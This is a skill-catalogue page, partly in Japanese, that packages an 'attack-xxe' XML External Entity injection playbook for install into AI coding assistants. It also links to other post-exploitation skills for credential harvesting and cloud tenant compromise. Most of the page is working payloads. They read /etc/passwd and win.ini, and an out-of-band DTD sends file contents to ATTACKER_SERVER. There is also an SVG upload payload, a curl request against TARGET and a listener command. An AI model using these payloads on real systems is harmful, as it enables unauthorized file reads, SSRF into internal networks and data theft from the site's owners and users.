メニュー
XML External Entity injection — file read, SSRF, data exfiltration via out-of-band XML parsing
Codex または Claude でインストール この Prompt をコピーして Codex、Claude、または他のアシスタントに貼り付けると、Skill ページを確認してインストールできます。
SOC 職業分類に基づく
eBPF-based post-exploitation for kernel-level credential harvesting, process hiding, and traffic interception on Linux
AWS post-exploitation for IAM privilege escalation, data exfiltration, persistence, and operational security via boto3
Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation
CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab
Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence
macOS post-exploitation for credential harvesting, DTrace monitoring, TCC bypass, and stealth operations via native tools
| name | attack-xxe |
| description | XML External Entity injection — file read, SSRF, data exfiltration via out-of-band XML parsing |
| category | web-application |
| version | 1.0 |
| author | cyberstrike-official |
| tags | ["xxe","xml","injection","web","attack"] |
| tech_stack | ["web","java","php","dotnet"] |
| cwe_ids | ["CWE-611","CWE-827"] |
| chains_with | ["attack-ssrf"] |
| prerequisites | [] |
| severity_boost | {"attack-ssrf":"XXE + SSRF = internal network access via XML parser"} |
Exploit XML parsing vulnerabilities to read local files, perform SSRF, or exfiltrate data via out-of-band channels.
Look for endpoints accepting:
Content-Type: application/xml or text/xml.asmx, .wsdl)<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
Windows targets:
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://ATTACKER_SERVER/xxe.dtd">
%xxe;
]>
<root>test</root>
Hosted DTD (xxe.dtd):
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://ATTACKER_SERVER/?data=%file;'>">
%eval;
%exfil;
Use the SSRF listener for callback detection:
attack_script ssrf_listener -p 8888 -o xxe_hits.json
SVG:
<?xml version="1.0"?>
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg">
<text>&xxe;</text>
</svg>
DOCX: Modify [Content_Types].xml or word/document.xml inside the ZIP.
# Switch JSON endpoint to XML
curl -X POST https://TARGET/api/data \
-H "Content-Type: application/xml" \
-d '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>'
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % a "<!ENTITY xxe SYSTEM 'file:///etc/passwd'>">
%a;
]>
<root>&xxe;</root>
| Finding | Severity |
|---|---|
| File contents read (e.g., /etc/passwd) | Critical (P1) |
| Out-of-band DNS/HTTP callback | High (P2) |
| SSRF via XXE | High (P2) |
| Denial of Service (billion laughs) | Medium (P3) |
| Error-based file path disclosure | Low (P4) |
attack_script ssrf_listener — OOB callback listener for blind XXEattack_script file_upload_tester — SVG XXE via upload